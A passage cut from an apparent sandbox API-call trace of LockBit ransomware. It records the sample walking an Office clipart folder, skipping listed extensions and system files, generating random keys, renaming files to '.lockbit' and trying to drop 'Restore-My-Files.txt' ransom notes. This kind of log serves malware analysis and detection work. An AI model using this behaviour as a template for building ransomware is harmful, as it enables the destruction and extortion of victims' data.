dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.009] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.011] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02067_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02067_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.011] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.011] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.012] free (_Block=0x1fa2ed8) [0177.012] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02067_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.012] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.012] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.012] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63332000, ftCreationTime.dwHighDateTime=0x1bd4be9, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63332000, ftLastWriteTime.dwHighDateTime=0x1bd4be9, nFileSizeHigh=0x0, nFileSizeLow=0x1b4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02094_.WMF", cAlternateFileName="")) returned 1 [0177.012] lstrcmpiW (lpString1=".", lpString2="SO02094_.WMF") returned -1 [0177.012] lstrcmpiW (lpString1="..", lpString2="SO02094_.WMF") returned -1 [0177.012] PathFindExtensionW (pszPath="SO02094_.WMF") returned=".WMF" [0177.012] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.012] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.012] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.012] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.013] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.013] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02094_.WMF") returned -1 [0177.014] lstrcmpiW (lpString1="ntldr", lpString2="SO02094_.WMF") returned -1 [0177.014] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02094_.WMF") returned -1 [0177.014] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02094_.WMF") returned -1 [0177.014] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02094_.WMF") returned -1 [0177.014] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02094_.WMF") returned 1 [0177.014] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02094_.WMF") returned -1 [0177.014] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.014] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02094_.WMF") returned=".WMF" [0177.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.014] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.014] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.015] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.015] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02094_.WMF.lockbit") returned 72 [0177.015] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02094_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02094_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0177.016] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.016] malloc (_Size=0x40068) returned 0x3d70450 [0177.016] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6986) returned 1 [0177.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0177.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0177.018] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.021] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02094_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02094_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.021] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.021] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.023] free (_Block=0x1fa2ed8) [0177.023] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02094_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.023] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.023] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.023] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95d01f00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95d01f00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02227_.WMF", cAlternateFileName="")) returned 1 [0177.023] lstrcmpiW (lpString1=".", lpString2="SO02227_.WMF") returned -1 [0177.023] lstrcmpiW (lpString1="..", lpString2="SO02227_.WMF") returned -1 [0177.023] PathFindExtensionW (pszPath="SO02227_.WMF") returned=".WMF" [0177.023] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.023] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.023] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.023] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.023] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.023] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.023] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.023] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.024] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.024] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02227_.WMF") returned -1 [0177.025] lstrcmpiW (lpString1="ntldr", lpString2="SO02227_.WMF") returned -1 [0177.025] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02227_.WMF") returned -1 [0177.025] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02227_.WMF") returned -1 [0177.025] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02227_.WMF") returned -1 [0177.025] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02227_.WMF") returned 1 [0177.025] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02227_.WMF") returned -1 [0177.025] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.025] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02227_.WMF") returned=".WMF" [0177.025] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.025] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.025] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.026] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.026] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02227_.WMF.lockbit") returned 72 [0177.026] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02227_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02227_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.027] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.027] malloc (_Size=0x40068) returned 0x3f70048 [0177.027] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=1344) returned 1 [0177.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0177.028] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0177.029] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0177.032] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02227_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02227_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.032] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.032] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.034] free (_Block=0x1fa2ed8) [0177.034] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02227_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.034] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.034] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.034] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf83e1500, ftCreationTime.dwHighDateTime=0x1bd4bf9, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf83e1500, ftLastWriteTime.dwHighDateTime=0x1bd4bf9, nFileSizeHigh=0x0, nFileSizeLow=0x334, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02228_.WMF", cAlternateFileName="")) returned 1 [0177.034] lstrcmpiW (lpString1=".", lpString2="SO02228_.WMF") returned -1 [0177.034] lstrcmpiW (lpString1="..", lpString2="SO02228_.WMF") returned -1 [0177.034] PathFindExtensionW (pszPath="SO02228_.WMF") returned=".WMF" [0177.034] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.034] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.035] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.035] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.035] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.035] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.035] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.035] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.035] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.035] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.035] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.036] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.036] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02228_.WMF") returned -1 [0177.036] lstrcmpiW (lpString1="ntldr", lpString2="SO02228_.WMF") returned -1 [0177.036] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02228_.WMF") returned -1 [0177.036] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02228_.WMF") returned -1 [0177.036] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02228_.WMF") returned -1 [0177.036] lstrcmpiW 